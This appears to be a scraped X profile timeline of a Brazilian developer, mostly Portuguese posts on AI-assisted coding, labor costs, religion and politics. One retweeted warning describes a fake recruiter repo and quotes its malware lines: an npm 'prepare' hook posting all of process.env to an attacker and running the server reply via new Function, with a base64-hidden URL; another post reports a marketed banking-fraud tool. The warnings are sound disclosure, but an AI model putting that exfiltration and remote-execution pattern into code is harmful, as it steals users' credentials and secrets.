Wouerner Brandão

2K posts

Wouerner Brandão banner
Wouerner Brandão

Wouerner Brandão

@wouerner

Relatos do meu trabalho para o mundo.

Brasilia Katılım Ekim 2009
254 Takip Edilen260 Takipçiler
Fabio Vedovelli
Fabio Vedovelli@vedovelli74·
⚠️ Devs, parem tudo e leiam. Quase rodei malware na minha máquina agora mesmo e quero que vocês saibam exatamente como funciona o golpe. Recebi um link de um repo no GitHub: um "MVP" de um projeto web3/poker, com pedido pra clonar e rodar localmente. Visual de teste técnico, daqueles que recruiter manda. Antes de tocar em qualquer coisa, parei e li o código pelo próprio GitHub, sem clonar. Bem que desconfiei. Era malware. E não um qualquer — tinha DOIS payloads que executam SOZINHOS, sem você rodar nada explicitamente. 🎯 Payload 1 — dispara no `npm install` O `package.json` tinha `"prepare": "node server/server.js"`. O detalhe maldoso: o script `prepare` roda AUTOMÁTICO toda vez que você dá `npm install`. Dentro dele, escondido nas rotas do servidor, um: `axios.post(url, { ...process.env })` Ou seja: ele empacota TODAS as suas variáveis de ambiente — chaves de AWS, tokens de API, secrets, seed phrase de carteira cripto — e manda pro servidor do atacante. E não para aí: a RESPOSTA do servidor é passada pra `new Function("require", resposta)(require)`. Isso é execução de código arbitrário, com acesso total ao Node: filesystem, child_process, rede. Ele pode roubar suas chaves SSH, instalar persistência, o que quiser. A URL do atacante? Escondida em base64 no `.env`, decodificando pra um domínio na Vercel. Disfarce em cima de disfarce.
Fabio Vedovelli tweet media
Português
31
324
1.1K
674.3K
blog:leandronsp.com
blog:leandronsp.com@leandronsp·
eu acho mto triste que péssimos exemplos como esses que ele trouxe são o argumento dos doomers para invalidar uso de AI assisted coding. aqui na empresa não é tolerado de forma alguma a entrega com bugs, tudo é feito com rigor como sempre foi antes de AI, e ainda assim entregamos com uso de AI. triste, pq parece que o padrão da indústria é fazer de qq jeito, aí vc para um pouco e reflete que sempre foi assim, nada de novo sob o Sol 😅
Português
2
0
7
1K
Shinobu
Shinobu@Shinobu_uwu·
falou tudo, respeito muito o mitchell, um dos melhores engenheiros que eu conheço.
Mitchell Hashimoto@mitchellh

I strongly believe there are entire companies right now under heavy AI psychosis and its impossible to have rational conversations about it with them. I can't name any specific people because they include personal friends I deeply respect, but I worry about how this plays out. I lived through the great MTBF vs MTTR (mean-time-between-failure vs. mean-time-to-recovery) reckoning of infrastructure during the transition to cloud and cloud automation. All those arguments are rearing their ugly heads again but now its... the whole software development industry (maybe the whole world, really). It's frightening, because the psychosis folks operate under an almost absolute "MTTR is all you need" mentality: "its fine to ship bugs because the agents will fix them so quickly and at a scale humans can't do!" We learned in infrastructure that MTTR is great but you can't yeet resilient systems entirely. The main issue is I don't even know how to bring this up to people I know personally, because bringing this topic up leads to immediately dismissals like "no no, it has full test coverage" or "bug reports are going down" or something, which just don't paint the whole picture. We already learned this lesson once in infrastructure: you can automate yourself into a very resilient catastrophe machine. Systems can appear healthy by local metrics while globally becoming incomprehensible. Bug reports can go down while latent risk explodes. Test coverage can rise while semantic understanding falls. Changes happens so fast that nobody notices the underlying architecture decaying. I worry.

Português
1
0
8
2.1K
montano
montano@lucas_montano·
i built this so you don’t have to remember or lose your API KEYS anymore
English
15
4
269
31.1K
Wouerner Brandão retweetledi
zinho
zinho@zinhodev·
Desenvolvedores de software tinham uma mina de ouro nas mãos Poderiam ter se unido e criado proteções para a carreira como os médicos fazem. Mas, na ilusão neoliberal, competiram, se venderam e leiloram tudo que produziam, até serem substituídos pelo software que eles criaram
Português
181
143
2.4K
194K
Wouerner Brandão
Wouerner Brandão@wouerner·
@dlemesdev Faz assim, se tu gosta tanto de pagar imposto, paga os meus, mando onde o boleto...............
Português
0
0
0
5
daniel
daniel@dlemesdev·
Pra nao cair no papo de que se alguém ganha R$ 3.200 (CLT) ele custa 5k dado a entender que o que tem acima dos 3200 é imposto, olha o custo real. Salário: R$ 3.200 Encargos (~R$ 1.100): • INSS (~R$ 640) → vira aposentadoria/benefícios • FGTS (~R$ 256) → é do trabalhador • Outros impostos (~R$ 200) → não voltam direto Provisões: • 13º: ~R$ 340 → do trabalhador • Férias + 1/3: ~R$ 455 → do trabalhador Custo total: ~R$ 5.100 Parte “do trabalhador”: ~R$ 4.250 Impostos sem retorno direto: ~R$ 850
Português
198
104
1.6K
225.2K
felype
felype@cyberlype·
O bom de ter entrado em CyberSecurity é perceber que só tem maluco aqui no X mesmo Kkkkkkkkkkkkkk
Português
4
7
136
4.1K
Kraggi
Kraggi@Kraggich·
Nyx 0.4.4 — Sessions that survive ✨ Your agents keep running when you close the app. Background daemon, menu bar icon with active-agent counter, and full conversation resume for all 6 CLIs.
English
7
2
45
6.9K
Wouerner Brandão
Wouerner Brandão@wouerner·
@enrichthesoil O cara tava na reunião e não conseguiu defender as ideia, e veio encontrar apoio.... Fraco demais, eu não deixava...
Português
0
0
0
31
bruno C# de burro 💼 Professional Website Clicker
acabei de sair de uma reunião onde decidiram refatorar todo o sistema. estou trabalhando em uma fintech com tecnologia de ponta, nodejs, mongodb, etc... agora querem colocar tudo DELPHI pq viram um cara falando mal de tecnologia nova e elogiando legado. já compramos 20 licenças da Embarcadero.
Português
63
8
535
49.1K
Framework
Framework@FrameworkPuter·
Every time we engage with an influencer on X dot com, Dell sends them an XPS. Anyone want a free Dell XPS?
English
1.9K
192
9.8K
555.7K
Clandestine
Clandestine@akaclandestine·
A high-risk illegal tool called Tela Caixa Física + Jurídica Operadora (Mobile & Desktop) is being openly marketed for R$ 2,000 per month. Advertised features include: • Selective data harvesting of individuals (Pessoa Física — PF) and legal entities (Pessoa Jurídica — PJ) • CPF + CNPJ APIs • Operator commands for sending QR Codes and numerous other remote controls • Complete dashboard with real-time metrics, statistics, and separation between physical and legal persons • Ability to enable/disable specific data collection (only PF, only PJ, or both) • Full command control (return to start, switch account types, module updates, and all tokens) This solution is explicitly designed for mass unauthorized collection of personal and corporate data, social engineering, and banking fraud, constituting serious violations of Brazil’s LGPD (General Data Protection Law), the Penal Code (fraud and electronic fraud), and the Internet Civil Rights Framework. The ad highlights “limited spots” and includes a demonstration video. #CyberAlert #BankFraud #TelaCaixa #CyberCrime #LGPD #DataProtection #ReportFraud #CyberSecurity @Caixa
Português
15
34
314
28.8K
VITINHO
VITINHO@euvitin0·
@danilocsts O segredo do realismo é o MoCap: humanos reais gravando cada passo pra tirar aquele ar de robô e dar um gingado de verdade pro jogo. É o puro suco do perfeccionismo!
Português
2
0
9
10.7K
dan
dan@danilocsts·
desde 2004, é assim que a rockstar dá vida às dançarinas do gta, ​por trás de cada npc dançando no game, existe uma pessoa real num traje de motion capture
Português
1.1K
1.6K
51.6K
12.5M
Fernanda Kipper
Fernanda Kipper@kipperdev·
acabamos de reduzir o time da Pora de volta pra 3 pessoas (tínhamos + 2 PJs ajudando) algumas tarefas simplesmente não podem ser paralelizadas nem delegadas no início E uma coisa interessante é: comecei a ler o livro "Mítico Homem Mês" essa semana, e o autor já falava isso há 50 anos atrás. Certas tarefas por conta da sua natureza não são completadas mais rapidamente se houver mais pessoas realizando elas. Por exemplo: se 1 programador demora 9 dias pra fazer uma tarefa, 9 programadores demorariam 1 dia, certo? Não necessariamente. Apesar de parecer que quebrar um problema em 9 pedaços e distribuir vai ser mais rápido, na verdade adiciona outras complexidades no processo, como: - Gerenciar a comunicação entre 9 pessoas - Os códigos precisariam ser feitos de maneira 100% compatível - o que a gente sabe que não acontece ... - Passagem de contexto de um para o outro também leva tempo O mais doido é que isso parece não se aplicar só a tarefas de código, mas deixo essa discussão pra outro tweet.
Português
18
9
315
35.3K
Wouerner Brandão retweetledi
Madeleine Lacsko
Madeleine Lacsko@madeleinelacsko·
Lembram quando eu disse que o PL da Misoginia era apenas desculpa para calar mulheres? Está comprovado. Acabo de receber do @x de @elonmusk um pedido de censura feito por @ErikakHilton e levado adiante pela @AdvocaciaGeral Se juntaram para pedir para eu deletar um post. Amanhã farei a LIVE da censura no meu canal. Pela primeira vez, em 30 anos de jornalismo, terei de apagar o que escrevi a mando oficial de um governo. Pior: dizem fazer isso para combater misoginia. Acompanhem em youtube.com/MadeleineLacsko
Português
816
1.7K
8.7K
450.2K
FarmDev
FarmDev@farmDev79·
Eu sou um tipo de cristão que não discrimina ninguém. Jesus trocava ideias com puta, ladrão, maluco e até cobrador de impostos. Se bobear ele perdoaria até o Haddad
Português
8
1
72
1.8K
rodrigo ᶜʳᶠ
rodrigo ᶜʳᶠ@rodrigocrf0·
Na boa, como existem pessoas que não acreditam em Deus? - Sol na distância ideal - Gravidade adequada - Água líquida - Campo magnético - Atmosfera protetora - Presença da Lua - Inclinação do eixo da Terra - Júpiter protegendo a Terra Tudo perfeito demais pra ter surgido do nada
diesgu@diesgu

o por do sol visto do espaço

Português
2.3K
3.3K
26.7K
2.6M
Wouerner Brandão
Wouerner Brandão@wouerner·
Tive um estalo hoje pela manhã, eu não sinto diferença entre claudin code, gmini no console e o augmentcode (empresa que paga) no fim eu troco entre eles de forma tranquila. E como dizem, um graveto na mão do mestre e um arma, enquanto uma espada na mão do novato e um graveto
Português
0
0
1
29